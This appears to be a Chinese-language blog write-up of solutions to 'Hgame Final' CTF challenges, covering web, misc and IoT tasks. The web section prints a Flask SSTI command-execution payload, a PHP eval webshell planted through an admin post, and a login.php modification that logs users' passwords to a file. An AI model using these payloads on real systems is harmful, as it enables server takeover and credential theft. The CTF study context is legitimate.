Hgame Final

Web

Final Flask

题解

  • 常规ssti
{{url_for.__globals__['os'].popen('/readflag').read()}}

PHP-Blog

题解

  • 登陆admin,可以同过创建新文章的方式写入一句话木马
<?php system('echo "<?php eval(\$_POST[\'cmd\']); ?>" > test.php') ?>
  • test.php蚁剑连接
  • 根据题目描述,将会存在一个用户登陆,修改login.php记录账号密码
file_put_contents('./password', $_POST['username'].' '.$_POST['password']);

Misc

锟斤拷

题解

no_title

题解

  • 得到压缩包,文件名为:籽籸籭籪粂籨籲籼籨籪籨籰籸籸籭籨籭籪粂籨籃簲
  • 爆破得到密码
a = '籽籸籭籪粂籨籲籼籨籪籨籰籸籸籭籨籭籪粂籨籃簲'
a = [hex(ord(i)) for i in a]

# ['0x7c7d', '0x7c78', '0x7c6d', '0x7c6a', '0x7c82', '0x7c68', '0x7c72', '0x7c7c', '0x7c68', '0x7c6a', '0x7c68', '0x7c70', '0x7c78', '0x7c78', '0x7c6d', '0x7c68', '0x7c6d', '0x7c6a', '0x7c82', '0x7c68', '0x7c43', '0x7c32']
  • 观察发现都以0x7c开头,尝试爆破原文
for i in  range(50):
    print(bytes([int(_, 16) - i for _ in a]))

"""
b'}xmj\x82hr|hjhpxxmhmj\x82hC2'
b'|wli\x81gq{gigowwlgli\x81gB1'
b'{vkh\x80fpzfhfnvvkfkh\x80fA0'
b'zujg\x7feoyegemuujejg\x7fe@/'
b'ytif~dnxdfdlttidif~d?.'
b'xshe}cmwcecksshche}c>-'
b'wrgd|blvbdbjrrgbgd|b=,'
b'vqfc{akuacaiqqfafc{a<+'
b'upebz`jt`b`hppe`ebz`;*'
b'today_is_a_good_day_:)'
b'snc`x^hr^`^fnnc^c`x^9('
b"rmb_w]gq]_]emmb]b_w]8'"
b'qla^v\\fp\\^\\dlla\\a^v\\7&'
b'pk`]u[eo[][ckk`[`]u[6%'
b'oj_\\tZdnZ\\Zbjj_Z_\\tZ5$'
b'ni^[sYcmY[Yaii^Y^[sY4#'
b'mh]ZrXblXZX`hh]X]ZrX3"'
b'lg\\YqWakWYW_gg\\W\\YqW2!'
b'kf[XpV`jVXV^ff[V[XpV1 '
b'jeZWoU_iUWU]eeZUZWoU0\x1f'
b'idYVnT^hTVT\\ddYTYVnT/\x1e'
b'hcXUmS]gSUS[ccXSXUmS.\x1d'
b'gbWTlR\\fRTRZbbWRWTlR-\x1c'
b'faVSkQ[eQSQYaaVQVSkQ,\x1b'
b'e`URjPZdPRPX``UPURjP+\x1a'
b'd_TQiOYcOQOW__TOTQiO*\x19'
b'c^SPhNXbNPNV^^SNSPhN)\x18'
b'b]ROgMWaMOMU]]RMROgM(\x17'
b"a\\QNfLV`LNLT\\\\QLQNfL'\x16"
b'`[PMeKU_KMKS[[PKPMeK&\x15'
b'_ZOLdJT^JLJRZZOJOLdJ%\x14'
b'^YNKcIS]IKIQYYNINKcI$\x13'
b']XMJbHR\\HJHPXXMHMJbH#\x12'
b'\\WLIaGQ[GIGOWWLGLIaG"\x11'
b'[VKH`FPZFHFNVVKFKH`F!\x10'
b'ZUJG_EOYEGEMUUJEJG_E \x0f'
b'YTIF^DNXDFDLTTIDIF^D\x1f\x0e'
b'XSHE]CMWCECKSSHCHE]C\x1e\r'
b'WRGD\\BLVBDBJRRGBGD\\B\x1d\x0c'
b'VQFC[AKUACAIQQFAFC[A\x1c\x0b'
b'UPEBZ@JT@B@HPPE@EBZ@\x1b\n'
b'TODAY?IS?A?GOOD?DAY?\x1a\t'
b'SNC@X>HR>@>FNNC>C@X>\x19\x08'
b'RMB?W=GQ=?=EMMB=B?W=\x18\x07'
b'QLA>V<FP<><DLLA<A>V<\x17\x06'
b'PK@=U;EO;=;CKK@;@=U;\x16\x05'
b'OJ?<T:DN:<:BJJ?:?<T:\x15\x04'
b'NI>;S9CM9;9AII>9>;S9\x14\x03'
b'MH=:R8BL8:8@HH=8=:R8\x13\x02'
b'LG<9Q7AK797?GG<7<9Q7\x12\x01'
"""
  • 得到密码
today_is_a_good_day_:)
  • 解压得到一张图片,发现可以变成一个正方形,写脚本,得到二维码
from PIL import Image


file = Image.open('test5.png')
a = 1280
for i in range(a):
    for j in range(a):
        b = file.getpixel((j, i))[0]
        if b == 255:
            b = 1
        print(b, end='')
  • 得到一张二维码,扫码得到一张图片,在 r0 通道发现三个定位块
  • 将其保存,与原图进行叠加,扫描得到flag

Iot

BLE

题解

  • 安装Bluetooth LE Exploer
  • 连接蓝牙,读取内容,得知需要发送 times
  • 发送times,得到flag
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇